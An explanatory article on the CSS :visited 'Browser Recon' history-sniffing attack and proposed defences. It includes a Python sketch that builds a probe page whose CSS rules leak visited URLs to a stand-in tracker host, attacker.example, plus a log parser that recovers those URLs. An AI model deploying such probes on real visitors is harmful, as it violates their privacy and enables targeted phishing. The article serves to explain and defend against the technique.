Guessing Your Bank

Do you use an online bank? Have you ever received a phishing email from a bank? If it were your bank, would you be more likely to believe it? Most people would. Researchers Markus Jakobsson, Tom N. Jagatic and Sid Stamm have identified a method that phishers might use to detect which bank you use. This attack, which they call a Browser Recon attack, can be employed by any web site to make guesses at your browsing history. Using a simple trick, any site can query your browser and find out which sites you have visited.

The Underlying Technology

Cascading Style Sheets (CSS) is a technology employed by a vast range of websites to make their pages attractive; CSS can be used to set the shape and size of text or images, as well as rearrange things on the page. In fact, this web page uses CSS to underline the section headings. One common use of CSS is to color visited links differently from unvisited links. Often, this is intended as a visual cue to someone reading a page, so they know which links they have already followed.

Another feature of CSS allows it to load images, using CSS code such as background:url('img.jpg'). This feature is usually used to layer pictures and text on top of each other.

A different background can be loaded for visited and unvisited links; moreover, a different background can be loaded for each individual visited or unvisited link. A web programmer could set up a website that does just that, but loads the images from his own server. Since he owns the server, he can keep track of which images are requested and so determine which of the links each visitor has previously followed!
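The idea in the paragraph above can be sketched in a few lines of Python that generate the page and then read the server's request log. This is only an illustration under stated assumptions: the tracker address attacker.example, the /hit path, the u= parameter and both function names are made up for the example and do not come from the researchers' demo. Browsers released since this was written restrict what a :visited rule may do, so treat it as a picture of the technique as described here rather than something that works everywhere.

```python
from html import escape
from urllib.parse import quote, unquote

# Hypothetical attacker-controlled endpoint (an assumption, not from the article).
TRACKER = "http://attacker.example/hit"


def build_probe_page(candidates):
    """Return HTML holding one link and one CSS rule per candidate URL.

    Each rule requests a distinct background image, and only applies
    when the browser renders that particular link as visited.
    """
    rules, links = [], []
    for i, url in enumerate(candidates):
        tag = quote(url, safe="")  # encode the guessed URL into the image address
        rules.append(
            "#l%d:visited { background: url('%s?u=%s'); }" % (i, TRACKER, tag)
        )
        links.append('<a id="l%d" href="%s">&nbsp;</a>' % (i, escape(url, quote=True)))
    return "<style>\n" + "\n".join(rules) + "\n</style>\n" + "\n".join(links)


def visited_from_log(request_paths):
    """Recover the guessed URLs from the image requests the server received."""
    seen = []
    for path in request_paths:
        _, _, query = path.partition("?u=")
        if query:  # ignore requests that are not tracker hits
            seen.append(unquote(query))
    return seen
```

Calling build_probe_page with a list of bank addresses yields the page to serve; passing the resulting request paths to visited_from_log gives back the addresses whose images were fetched, which are the ones the visitor's browser treated as visited.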

Why does this matter?

Knowing who you bank with: This is really scary if the web programmer happens to be an evil phisher. He can find out which bank websites you've seen and then make his site look like your bank's -- no matter who your bank is. Since people are more likely to believe phishing sites or emails that look like their specific bank, this type of attack is particularly vicious.

Personalized content: Online stores can use this technique to see whether or not you have been to the competition's website. If you've been to a bookstore's competitor, the bookstore may be inclined to lower its prices; on the other hand, if you haven't, it might try to charge you more! This means you could be viewing different prices depending on where you've been browsing.

Would Phishers Really Use Browser-Recon?

Yes. Sniffing someone's browsing history is a very simple attack, and it does not take very long to implement. The most time-consuming part is selecting which URLs to guess. Once that is complete, listing them and probing browsers takes only moments. 300 sites can easily be checked in just a few seconds.

How can we stop these browser-recon attacks?

This is not a new vulnerability, and it is not likely to be fixed by the people who designed CSS, since the features involved are too valuable. The following are a few solutions that have been proposed. A simple, complete alternative is to operate a browser with caching, history and bookmarks (or favorites) completely disabled; then there's no information to be "sniffed"!

Isolate each site (a client-side solution): If your browser only allows a site, say http://bank.com, to see where you've been within the bank.com domain, it will have no idea what other sites you've been to. Jackson et al. of Stanford have been working on SafeHistory, a browser plugin that isolates sites from one another in this way. This may cause unwanted side effects, however. If you have a portal web page you regularly visit with a list of links (to newspapers, search engines, friends' sites, etc.) that you want to follow, it might be useful to know which ones you've already seen. Unless all the links point to the same site that hosts your portal, this plugin will make them always seem unvisited.
Make the links hard to guess (a server-side solution): Professor Markus Jakobsson and PhD student Sid Stamm have come up with a solution that makes the URLs really hard to guess. Since an attacker has to list the URLs he wants to test, if they have random numbers embedded, he would have to guess all the random numbers too. For example, if two-digit random numbers (0-99) are included in http://www.guess.me/[random number], then an attacker would have to try http://www.guess.me/0, then with a 1, with a 2, and so on through all 100 different URLs. Imagine if it was a 100-digit number! Then he'd have to try far too many (1 followed by 100 zeros) different numbers! Even on the fastest computers, trying them all is not feasible.
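Both proposals above can be pictured with a short Python sketch. It is an illustration only: the function names are invented here, the same-site test (matching scheme, host and port) is an assumed reading of "isolate each site" and is not SafeHistory's actual code, and the token format is an assumption rather than the scheme from the Jakobsson and Stamm paper.

```python
import secrets
from urllib.parse import urlsplit


def same_site(page_url, link_url):
    """True when both URLs share scheme, host, and port (assumed policy)."""
    a, b = urlsplit(page_url), urlsplit(link_url)
    return (a.scheme, a.hostname, a.port) == (b.scheme, b.hostname, b.port)


def show_as_visited(page_url, link_url, history):
    """Client-side idea: reveal visited state only for links to the page's own site."""
    return link_url in history and same_site(page_url, link_url)


def unguessable_url(base, digits=100):
    """Server-side idea: append a random string of decimal digits to the URL."""
    token = "".join(secrets.choice("0123456789") for _ in range(digits))
    return base.rstrip("/") + "/" + token


def guesses_needed(digits):
    """How many distinct digit strings an attacker would have to list."""
    return 10 ** digits
```

With these definitions, guesses_needed(2) is 100, matching the two-digit example, and the count grows by a factor of ten for every extra digit. The portal side effect also shows up directly: show_as_visited returns False for any link that leaves the portal's own site, even when that link is in the history.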

Additional Information

http://browser-recon.info: A site, complete with a demo, describing the technical details of browser-recon and showing how it works.
Stanford SafeHistory: A project that enforces a same-origin policy on browser history.
An academic paper (pdf 572kb) by Markus Jakobsson and Sid Stamm with a deeper description of the problem and the random-number solution.
Markus Jakobsson: Researches phishing and countermeasures at Indiana University.
Sid Stamm: Also researches phishing and social aspects of web privacy at Indiana University.